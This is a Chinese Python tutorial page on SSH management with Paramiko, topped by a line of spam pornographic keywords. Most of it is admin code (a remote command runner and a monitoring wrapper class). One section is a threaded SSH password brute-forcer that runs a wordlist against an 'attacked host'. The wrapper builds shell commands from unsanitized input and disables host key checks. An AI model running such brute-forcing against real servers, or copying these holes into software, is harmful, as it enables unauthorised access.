欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

Python使用Paramiko庫實現(xiàn)SSH管理詳解

 更新時間:2023年11月23日 14:36:52   作者:微軟技術(shù)分享  
paramiko 是一個用于在Python中實現(xiàn)SSHv2協(xié)議的庫,它支持對遠(yuǎn)程服務(wù)器進(jìn)行加密的通信,本文主要介紹了如何使用Paramiko庫實現(xiàn)SSH管理,感興趣的小伙伴可以學(xué)習(xí)一下

paramiko 是一個用于在Python中實現(xiàn)SSHv2協(xié)議的庫,它支持對遠(yuǎn)程服務(wù)器進(jìn)行加密的通信。目前該模塊支持所有平臺架構(gòu)且自身遵循SSH2協(xié)議,支持以加密和認(rèn)證的方式,進(jìn)行遠(yuǎn)程服務(wù)器的連接,你可以在Python中實現(xiàn)SSH客戶端和服務(wù)器,并進(jìn)行安全的文件傳輸和遠(yuǎn)程命令執(zhí)行。

主要特點:

  • SSH 支持: paramiko 提供了對 SSHv2 協(xié)議的完整支持,可以用于安全地連接和通信到遠(yuǎn)程服務(wù)器。
  • SSH 客戶端和服務(wù)端實現(xiàn): paramiko 不僅可以用作 SSH 客戶端,還可以在 Python 中實現(xiàn) SSH 服務(wù)器。這意味著你可以使用 paramiko 來創(chuàng)建自己的 SSH 服務(wù)器,或者編寫客戶端與遠(yuǎn)程服務(wù)器進(jìn)行通信。
  • SFTP 文件傳輸: paramiko 包含了對 SFTP(SSH 文件傳輸協(xié)議)的實現(xiàn),可以在安全通道上傳輸文件,支持上傳和下載文件。
  • 支持密鑰認(rèn)證: 除了用戶名和密碼認(rèn)證外,paramiko 還支持使用密鑰進(jìn)行認(rèn)證,包括支持 RSA 和 DSA 密鑰。
  • 多種認(rèn)證方法: 支持多種認(rèn)證方法,包括密碼認(rèn)證、密鑰認(rèn)證、GSS-API 認(rèn)證等。
  • 高級特性: 提供了一些高級特性,如端口轉(zhuǎn)發(fā)(port forwarding)、代理支持等,使其適用于更復(fù)雜的網(wǎng)絡(luò)場景。
  • 跨平臺: paramiko 可以在多個平臺上運(yùn)行,包括 Linux、Windows 和 macOS。
  • 易用性: 提供了簡單而易用的 API,使得在 Python 中進(jìn)行 SSH 連接、文件傳輸?shù)炔僮髯兊萌菀住?/li>
  • 活躍的社區(qū)支持: paramiko 是一個開源項目,擁有活躍的社區(qū)支持。這意味著你可以在社區(qū)中找到文檔、示例代碼和得到技術(shù)支持。

實現(xiàn)簡單SSH連接

import paramiko,threading
import argparse

class MyThread(threading.Thread):
    def __init__(self,address,username,password,port,command):
        super(MyThread, self).__init__()
        self.address = address
        self.username = username
        self.password = password
        self.port = port
        self.command = command
    def run(self):
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        try:
            ssh.connect(self.address, port=self.port, username=self.username, password=self.password, timeout=1)
            stdin, stdout, stderr = ssh.exec_command(self.command)
            result = stdout.read()
            if not result:
                self.result = stderr.read()
            ssh.close()
            self.result = result.decode()
        except Exception:
            self.result = "0"
    def get_result(self):
        try:
            return self.result
        except Exception:
            return "0"

if __name__ == "__main__":
    # 使用方式: main.py -a 192.168.1.1 -u root -p 123123 -c ifconfig
    parser = argparse.ArgumentParser()
    parser.add_argument("-a",dest="addr",help="指定一個IP地址")
    parser.add_argument("-u",dest="user",help="指定目標(biāo)主機(jī)用戶名")
    parser.add_argument("-p",dest="passwd",help="指定目標(biāo)主機(jī)密碼")
    parser.add_argument("-c",dest="command",help="指定需要執(zhí)行的命令")
    args = parser.parse_args()
    if args.addr and args.user and args.passwd and args.command:
        obj = MyThread(str(args.addr),str(args.user),str(args.passwd),"22",str(args.command))
        obj.start()
        obj.join()
        ret = obj.get_result()
        if ret != "0":
            print(ret)
    else:
        parser.print_help()

實現(xiàn)SSH批量嘗試

import pexpect
import os,sys,time
import threading
import argparse

def SSHConnect(Host,User,Password,Port,Command):
    try:
        child = pexpect.spawn('ssh -l %s %s -p %s %s' %(User,Host,Port,Command),timeout=1)
        ret = child.expect([pexpect.TIMEOUT, 'Are you sure you want to continue connecting','[Pp]assword:',r"([^-]>|#)"])
        if ret == 0:                   # 連接超時
            child.close()
            return 0
        elif ret == 1:                 # SSH提示你是否確認(rèn)連接
            child.sendline ('yes')     # 我們輸入yes
            child.expect ('password: ')# 輸入yes后應(yīng)該提示輸入密碼,我們再次期待 password
            ret = child.expect([pexpect.TIMEOUT, 'password: '])
            if ret == 0:               # 連接超時
                child.close()
                return 0
        ret = child.sendline(Password)
        if ret == 5:
            #child.expect(pexpect.EOF)
            #return child.before
            return 1
        child.close()
        return 0
    except Exception:
        child.close()
        return 0

def ThreadBlast(Host,User,Password,Port,semaphore):
    semaphore.acquire()        # 加鎖
    global number,PassCount
    RetCode = SSHConnect(Host,User,Password,Port,"pwd")
    if RetCode == 1:
        print("[*] 索引: {}/{} --> 密碼: {}".format(str(number),str(PassCount),Password))
    else:
        print("[-] 索引: {}/{} --> 嘗試: {}".format(str(number),str(PassCount),Password))
        
    number = number + 1
    semaphore.release()       # 釋放鎖

if __name__ == "__main__":
    # 使用方式: main.py -H 192.168.1.10 -u root -p 22 -f burp.log
    parser = argparse.ArgumentParser()
    parser.add_argument("-H","--host",dest="host",help="輸入一個被攻擊主機(jī)IP地址")
    parser.add_argument("-u","--user",dest="user",help="輸入主機(jī)的用戶賬號,root")
    parser.add_argument("-p","--port",dest="port",help="輸入SSH的端口號,22")
    parser.add_argument("-f","--file",dest="file",help="設(shè)置密碼字典 wordlist.log")
    args = parser.parse_args()
    if args.host and args.user and args.port and args.file:
        number = 0
        semaphore = threading.Semaphore(4)
        fp = open(args.file,"r")
        PassList = fp.readlines()
        PassCount = len(PassList)
        for item in PassList:
            t = threading.Thread(target=ThreadBlast,args=(args.host,args.user,str(item.replace("\n","")),args.port,semaphore))
            t.start()
    else:
        parser.print_help()

封裝MySSH通用類

import paramiko, math

class MySSH:
    def __init__(self, address, username, password, default_port):
        self.address = address
        self.default_port = default_port
        self.username = username
        self.password = password

    # 初始化SSH接口
    def Init(self):
        try:
            self.ssh_obj = paramiko.SSHClient()
            self.ssh_obj.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            self.ssh_obj.connect(self.address, self.default_port, self.username, self.password, timeout=3,
                                 allow_agent=False, look_for_keys=False)
            self.sftp_obj = self.ssh_obj.open_sftp()
            return True
        except Exception:
            return False
        return False

    # 執(zhí)行命令并返回執(zhí)行結(jié)果
    def BatchCMD(self, command):
        try:
            stdin, stdout, stderr = self.ssh_obj.exec_command(command, timeout=3)
            result = stdout.read()
            if len(result) != 0:
                result = str(result).replace("\\n", "\n")
                result = result.replace("b'", "").replace("'", "")
                return result
            else:
                return None
        except Exception:
            return None

    # 執(zhí)行非交互命令 只返回執(zhí)行狀態(tài) ,或真或假
    def BatchCMD_NotRef(self, command):
        try:
            stdin, stdout, stderr = self.ssh_obj.exec_command(command, timeout=3)
            result = stdout.read()
            if len(result) != 0:
                return True
            else:
                return None
        except Exception:
            return False

    # 將遠(yuǎn)程文件下載到本地
    def GetRemoteFile(self, remote_path, local_path):
        try:
            self.sftp_obj.get(remote_path, local_path)
            return True
        except Exception:
            return False

    # 將本地文件上傳到遠(yuǎn)程
    def PutLocalFile(self, localpath, remotepath):
        try:
            self.sftp_obj.put(localpath, remotepath)
            return True
        except Exception:
            return False

    # 獲取文件大小
    def GetFileSize(self, file_path):
        ref = self.BatchCMD("du -s " + file_path + " | awk '{print $1}'")
        return ref.replace("\n", "")

    # 判斷文件是否存在
    def IsFile(self, file_path):
        return self.BatchCMD("[ -e {} ] && echo 'True' || echo 'False'".format(file_path))

    # 獲取系統(tǒng)型號
    def GetSystemVersion(self):
        return self.BatchCMD("uname")

    # 關(guān)閉SSH接口
    def CloseSSH(self):
        try:
            self.sftp_obj.close()
            self.ssh_obj.close()
        except Exception:
            pass

    # 測試主機(jī)連通率
    def GetPing(self):
        try:
            if self.GetSystemVersion() != None:
                print("{} 已連通.".format(self.address))
                return True
            else:
                return False
        except Exception:
            return False

    # 獲取文件列表,并得到大小
    def GetFileList(self, path):
        try:
            ref_list = []
            self.sftp_obj.chdir(path)
            file_list = self.sftp_obj.listdir("./")
            for sub_path in file_list:
                dict = {}
                file_size = self.GetFileSize(path + sub_path)
                dict[path + sub_path] = file_size
                ref_list.append(dict)
            return ref_list
        except Exception:
            return False

    # 將遠(yuǎn)程文件全部打包后拉取到本地
    def GetTarPackageAll(self, path):
        try:
            file_list = self.sftp_obj.listdir(path)
            self.sftp_obj.chdir(path)
            for packageName in file_list:
                self.ssh_obj.exec_command("tar -czf /tmp/{0}.tar.gz {0}".format(packageName))
                self.sftp_obj.get("/tmp/{}.tar.gz".format(packageName), "./file/{}.tar.gz".format(packageName))
                self.sftp_obj.remove("/tmp/{}.tar.gz".format(packageName))
                return True
        except Exception:
            return True

    # 獲取磁盤空間并返回字典
    def GetAllDiskSpace(self):
        ref_dict = {}
        cmd_dict = {"Linux\n": "df | grep -v 'Filesystem' | awk '{print $5 \":\" $6}'",
                    "AIX\n": "df | grep -v 'Filesystem' | awk '{print $4 \":\" $7}'"
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    # 根據(jù)不同版本選擇不同的命令
                    os_ref = self.BatchCMD(run_cmd)
                    ref_list = os_ref.split("\n")
                    # 循環(huán)將其轉(zhuǎn)換為字典
                    for each in ref_list:
                        # 判斷最后是否為空,過濾最后一項
                        if each != "":
                            ref_dict[str(each.split(":")[1])] = str(each.split(":")[0])
            return ref_dict
        except Exception:
            return False

    # 拉取內(nèi)存數(shù)據(jù)到本地。
    def GetAllMemSpace(self):
        cmd_dict = {"Linux\n": "cat /proc/meminfo | head -n 2 | awk '{print $2}' | xargs | awk '{print $1 \":\" $2}'",
                    "AIX\n": "svmon -G | grep -v 'virtual' | head -n 1 | awk '{print $2 \":\" $4}'"
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    mem_total = math.ceil(int(os_ref.split(":")[0].replace("\n", "")) / 1024)
                    mem_free = math.ceil(int(os_ref.split(":")[1].replace("\n", "")) / 1024)
                    percentage = 100 - int(mem_free / int(mem_total / 100))
                    print("利用百分比: {}  \t 總內(nèi)存: {}  \t 剩余內(nèi)存: {}".format(percentage,mem_total,mem_free))
                    return str(percentage) + " %"
        except Exception:
            return False

    # 獲取CPU利用率數(shù)據(jù)
    def GetCPUPercentage(self):
        ref_dict = {}
        cmd_dict = {"Linux\n": "vmstat | tail -n 1 | awk '{print $13 \":\" $14 \":\" $15}'",
                    "AIX\n": "vmstat | tail -n 1 | awk '{print $14 \":\" $15 \":\" $16}'"
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    ref_list = os_ref.split("\n")
                    for each in ref_list:
                        if each != "":
                            each = each.split(":")
                            ref_dict = {"us": each[0], "sys": each[1], "idea": each[2]}
            print("CPU利用率數(shù)據(jù): {}".format(ref_dict))
            return ref_dict
        except Exception:
            return False

    # 獲取到系統(tǒng)負(fù)載利用率 也就是一分鐘負(fù)載五分鐘負(fù)載十五分鐘負(fù)載
    def GetLoadAVG(self):
        ref_dict = {}
        cmd_dict = {"Linux\n": "cat /proc/loadavg | awk '{print $1 \":\" $2 \":\" $3}'",
                    "AIX\n": "uptime | awk '{print $10 \":\" $11 \":\" $12}'"
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    ref_list = os_ref.split("\n")
                    for each in ref_list:
                        if each != "":
                            each = each.replace(",","").split(":")
                            ref_dict = {"1avg": each[0],"5avg": each[1],"15avg": each[2]}
                            print("負(fù)載利用率: {}".format(ref_dict))
                            return ref_dict
            return False
        except Exception:
            return False

    # 獲取系統(tǒng)進(jìn)程信息,并返回字典格式
    def GetAllProcessSpace(self):
        ref_dict = {}
        cmd_dict = {"Linux\n": "ps aux | grep -v 'USER' | awk '{print $2 \":\" $11}' | uniq",
                    "AIX\n": "ps aux | grep -v 'USER' | awk '{print $2 \":\" $12}' | uniq"
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    ref_list = os_ref.split("\n")
                    for each in ref_list:
                        if each != "":
                            ref_dict[str(each.split(":")[0])] = str(each.split(":")[1])
            return ref_dict
        except Exception:
            return False

    # 檢測指定進(jìn)程是否存活
    def CheckProcessStatus(self,processname):
        cmd_dict = {"Linux\n": "ps aux | grep '{0}' | grep -v 'grep' | awk {1} | wc -l".format(processname,"{'print $2'}"),
                    "AIX\n": "ps aux | grep '{0}' | grep -v 'grep' | awk {1} | wc -l".format(processname,"{'print $2'}")
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    ret_flag = str(os_ref.split("\n")[0].replace(" ","").strip())
                    if ret_flag != "0":
                        return True
            return False
        except Exception:
            return "None"

    # 判斷指定進(jìn)程名是否存在,如果存在返回進(jìn)程 {PID:0,CPU:0,MEM:0}
    def CheckProcessName(self,ProcName):
        cmd_dict = {"Linux\n": "ps aux | grep '" + ProcName + "' | grep -v 'grep' | awk {'print $2 \":\" $3 \":\" $4'} | head -1",
                    "AIX\n": "ps aux | grep -v 'USER' | awk '{print $2 \":\" $12}' | uniq"
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    ref_list = os_ref.replace("\n","").split(":")
                    ref_dict = {"PID": ref_list[0], "CPU": ref_list[1], "Mem": ref_list[2]}
            return ref_dict
        except Exception:
            return False
        return False

    # 檢測指定端口是否存活
    def CheckPortStatus(self,port):
        cmd_dict = {"Linux\n": "netstat -antp | grep {0} | awk {1}".format(port,"{'print $6'}")
            ,       "AIX\n": "netstat -ant | grep {0} | head -n 1 | awk {1}".format(port,"{'print $6'}")
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    ret_flag = str(os_ref.split("\n")[0].replace(" ","").strip())
                    if ret_flag == "LISTEN" or ret_flag == "ESTABLISHED":
                        return True
            return False
        except Exception:
            return False

    # 修改當(dāng)前用戶密碼
    def SetPasswd(self,username,password):
        try:
            os_id = self.BatchCMD("id | awk {'print $1'}")
            print(os_id)
            if(os_id == "uid=0(root)\n"):
                self.BatchCMD("echo '{}' | passwd --stdin '{}' > /dev/null".format(password,username))
                return True
        except Exception:
            return False

if __name__ == "__main__":
    ssh = MySSH("132.35.69.71","root","123456789",22)
    if ssh.Init() == True:
        ref = ssh.GetAllDiskSpace()
        print(ref)

以上就是Python使用Paramiko庫實現(xiàn)SSH管理詳解的詳細(xì)內(nèi)容,更多關(guān)于Python Paramiko實現(xiàn)SSH管理的資料請關(guān)注腳本之家其它相關(guān)文章!

相關(guān)文章

  • 淺談numpy.where() 的用法和np.argsort()的用法說明

    淺談numpy.where() 的用法和np.argsort()的用法說明

    這篇文章主要介紹了淺談numpy.where() 的用法和np.argsort()的用法說明,具有很好的參考價值,希望對大家有所幫助。一起跟隨小編過來看看吧
    2021-05-05
  • python實現(xiàn)解數(shù)獨(dú)程序代碼

    python實現(xiàn)解數(shù)獨(dú)程序代碼

    最近在帶孩子學(xué)習(xí)數(shù)獨(dú),職業(yè)使然,就上網(wǎng)搜了下相關(guān)程序的解法,這里分享給大家,希望對大家學(xué)習(xí)python有所幫助
    2017-04-04
  • Python內(nèi)建類型int源碼學(xué)習(xí)

    Python內(nèi)建類型int源碼學(xué)習(xí)

    這篇文章主要為大家介紹了Python內(nèi)建類型int源碼學(xué)習(xí),有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪
    2022-05-05
  • Python實現(xiàn)大文件排序的方法

    Python實現(xiàn)大文件排序的方法

    這篇文章主要介紹了Python大文件排序的方法,涉及Python針對文件、緩存及日期等操作的相關(guān)技巧,具有一定參考借鑒價值,需要的朋友可以參考下
    2015-07-07
  • Python如何實現(xiàn)xml解析并輸出到Excel上

    Python如何實現(xiàn)xml解析并輸出到Excel上

    本文介紹了如何使用Python的ElementTree模塊解析XML文件,并將解析后的數(shù)據(jù)寫入Excel文件,通過編寫XML文件、解析XML、編寫將數(shù)據(jù)寫入Excel的函數(shù),最終實現(xiàn)XML數(shù)據(jù)到Excel的轉(zhuǎn)換
    2025-02-02
  • Python爬蟲headers處理及網(wǎng)絡(luò)超時問題解決方案

    Python爬蟲headers處理及網(wǎng)絡(luò)超時問題解決方案

    這篇文章主要介紹了Python爬蟲headers處理及網(wǎng)絡(luò)超時問題解決方案,文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值,需要的朋友可以參考下
    2020-06-06
  • Python lambda和Python def區(qū)別分析

    Python lambda和Python def區(qū)別分析

    Python支持一種有趣的語法,它允許你快速定義單行的最小函數(shù)。這些叫做lambda的函數(shù),是從Lisp借用來的,可以用在任何需要函數(shù)的地方
    2014-11-11
  • 分享6個隱藏的python功能

    分享6個隱藏的python功能

    給大家詳細(xì)分析了6個隱藏的python功能,并詳細(xì)講解了每個功能用法,需要的朋友學(xué)習(xí)下吧。
    2017-12-12
  • python如何用matplotlib創(chuàng)建三維圖表

    python如何用matplotlib創(chuàng)建三維圖表

    這篇文章主要介紹了python如何在matplotlib中創(chuàng)建三維圖表,幫助大家更好的利用python進(jìn)行數(shù)據(jù)分析,感興趣的朋友可以了解下
    2021-01-01
  • python使用post提交數(shù)據(jù)到遠(yuǎn)程url的方法

    python使用post提交數(shù)據(jù)到遠(yuǎn)程url的方法

    這篇文章主要介紹了python使用post提交數(shù)據(jù)到遠(yuǎn)程url的方法,涉及Python使用post傳遞數(shù)據(jù)的相關(guān)技巧,需要的朋友可以參考下
    2015-04-04

最新評論